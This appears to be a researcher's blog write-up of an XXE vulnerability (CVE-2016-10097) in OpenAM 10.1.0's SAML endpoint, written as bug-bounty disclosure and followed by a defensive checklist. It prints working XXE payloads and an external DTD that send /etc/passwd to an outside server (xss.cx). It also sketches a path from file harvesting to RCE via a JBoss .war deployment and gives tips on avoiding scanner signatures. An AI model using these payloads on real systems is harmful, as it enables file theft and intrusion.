CVE-2016-10097, Open AM 10.1.0, XML Injection, XXE, External Entity Resolution, SSO Data Exfiltration, PoC

TL;DR – Open AM 10.1 exploitable via XXE at /SSOPOST/metaAlias/%realm%/idpv2

XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.

XXE is a means to an RCE Endpoint. XXE provides visibility into the Target System. You may find old JBOSS, PHP, Tomcat, Apache or other goodies that provide instant RCE. 

Comments for Open AM 10.1 SSO Admins: When performing XML Entity Injection against Applications there is Correlation Data to positively Confirm the Entity Expansion via HTTP and DNS Requests to our external Server.

XXE will aid in Recon to identify Installed Application(s), gaining a toehold for RCE. Leverage the XXE to perform Recon with LAN Scanning, File System Harvesting and connecting to 127.0.0.1.

Here is a portion of a sample SAML XXE Injection in Open AM 10.1 we reported Feb. 17, 2016 to a Bug Bounty. Our Fuzzing began with:

<!DOCTYPE foo [ <!ENTITY % file SYSTEM “file:///etc/motd”>
<!ENTITY % dtd SYSTEM “http://xss.cx/evil1.dtd”> %e1;%foo;%dtd;]>
<saml2p:AuthnRequest AssertionConsumerServiceURL=”https://xss.cx?1″ 
Destination=”https://xss.cx?2″ ForceAuthn=”false” ID=”” 
IsPassive=”false” IssueInstant=”2016-02-16T23:54:57.692Z” 
ProtocolBinding=”urn:oasis:names:tc:SAML:2.0:bindings:HTTP-GET” 
ProviderName=”XXX_XXX_A01″ Version=”2.0″ 
xmlns:saml2p=”urn:oasis:names:tc:SAML:2.0:protocol”>
<saml2:Issuer SPProvidedID=”XXX_XXX_A01″ xmlns:saml2=”urn:oasis:names:tc:SAML:2.0:assertion”>https://xss.cx?3;</saml2:Issuer>
<ds:Signature xmlns:ds=”http://www.w3.org/2000/09/xmldsig#”>
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm=”http://www.w3.org/2001/10/xml-exc-c14n#”/>
<ds:SignatureMethod Algorithm=”http://www.w3.org/2000/09/xmldsig#rsa-sha1″/>
<ds:Reference URI=”#”><ds:Transforms>
<ds:Transform Algorithm=”http://www.w3.org/2000/09/xmldsig#enveloped-signature”/>
<ds:Transform Algorithm=”http://www.w3.org/2001/10/xml-exc-c14n#”/>
</ds:Transforms>
<ds:DigestMethod Algorithm=”http://www.w3.org/2000/09/xmldsig#sha1″/>
<ds:DigestValue></ds:DigestValue></ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue></ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate></ds:X509Certificate>
</ds:X509Data>
<ds:KeyName></ds:KeyName>
</ds:KeyInfo></ds:Signature>
</saml2p:AuthnRequest>

We took the SAML POST in the Report and Modified the Injection Signatures, here they are:

BurpSuite Injects: <!DOCTYPE foo [<!ENTITY xxe123 SYSTEM “http://{host}.burpcollaborator.net”> ]>

Manual Check for /etc/passwd : <!DOCTYPE foo [ <!ENTITY % file SYSTEM “file:///etc/passwd”><!ENTITY % dtd SYSTEM “https://xss.cx/evil1.dtd”> %e1;%foo;%dtd;]>

Contents of evil1.dtd: <!ENTITY % p1 SYSTEM “file:///etc/passwd”><!ENTITY % p2 “<!ENTITY e1 SYSTEM ‘https://xss.cx/?%p1;’>”>%p2;

Results:

Sent the /etc/passwd file to our Server via XXE
Using XXE with /etc/passwd in a GET to xss.cx

Putting the whole picture together here is the XXE PoC in a Picture we submitted to a Bug Bounty.

NOTE – SAML Editor in the BApp Store will add the SAML Tab in the HTTP Message Editor to make it easy to perform manual XXE Testing
Bug Bounty Submission for XXE is worth a Billion Laughs!
A Picture is Worth a Billion Laughs!

On Twitter, we saw https://twitter.com/mitchmorby/status/700707393768783873.

XXE is a means to an RCE Endpoint.

Lets pull together all the pieces of our Report:
1. Identified an XXE and confirmed its support for Resolution of External Entities
2. Confirmed support for HTTP, DNS, FTP and the usual Protocol Support via XXE
3. Issued HTTP Requests via XXE to our Server, Consuming .dtd files
4. Sent the password file via XXE with a GET to our Server
5. Performed via XXE a Local System File Scan
6. File Scan then Identified a JBOSS Installation
7. XXE a GET to our Server containing the .xml configs
8. Web Browser to Access the Web Console once we found the URL in the configs
9. Confirmed RCE via .war file

Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You’ll need to update SessionID’s, Cookies and other HTTP Headers. Within the SAML, the XML will contain URI and custom resources that will need to be massaged by hand. Don’t push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you’ll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line, look at the pictures of what can be Harvested below.

XXE IoC’s for InfoSec Teams
1. IS your Server Patched and Up To Date?
2. Are you watching Outbound Connections from the XML Parser?

  • Port 21, 22, 23, 80, 443, 8080, 8443?
  • Are there Established Connections from an XML Host?
  • Did you see /etc/passwd in the GET or POST?
HTTP Logfiles showing an XXE GET containing /etc/passwd

3. Have you disabled External Entity Resolution?

  • Can an Attacker still reference URI’s?
    • What about upgrade history Logs?
Logfiles provide juicy details to identify RCE Endpoints, Server Version ID's and more..
XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.
      • Do you allow the XML Parser to Serve your ~root/.bash_history too?
XXE test for ~root/.bash_history
XXE Check for contents of ~root/.bash_history
  • Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
External Entity Injection can provide additional Pathways for an Attacker to find an RCE Endpoint
  • Can an Attacker abuse Protocol Handlers?
    • jar:// too?
    • How about those Windows Help Files?
    • Or find out where else you auth?
Information Exposure via LDAP allows an Attacker to gain insight into your Ops
.bash_history can provide additional clue to the Keys to the Kingdom

4. Have you sufficient Permissions on the XML Parser and its UID:GID?

  • To Prevent File System Scanning?
  • To Prevent LAN Scanning?
  • To prevent connecting to localhost?

5. Have you Programmatically disallowed for DNS Lookups from your XML Parser?

  • By modifying the Source

6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you’ve answered ‘NO’ to these Questions, its time to look for another Job)

Reading Material
Microsoft XML Parser Versions
GNOME XML Parser

Want to find XXE Bugs? You don’t need to Scan, just Browse a Site, find some XML and make a few simple GET and POST’s.. Burp Suite is excellent at finding XXE, but you don’t want to leave a large Signature yourself when testing for XXE.

ADDED March 21, 2016 - MS16-035 makes changes to XML Parser:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default


Happy Bug Hunting!

Creativity is the key to Art. A Picture is worth a billion laughs or when combined with the Text can create Artwork then sold to the highest Bidder.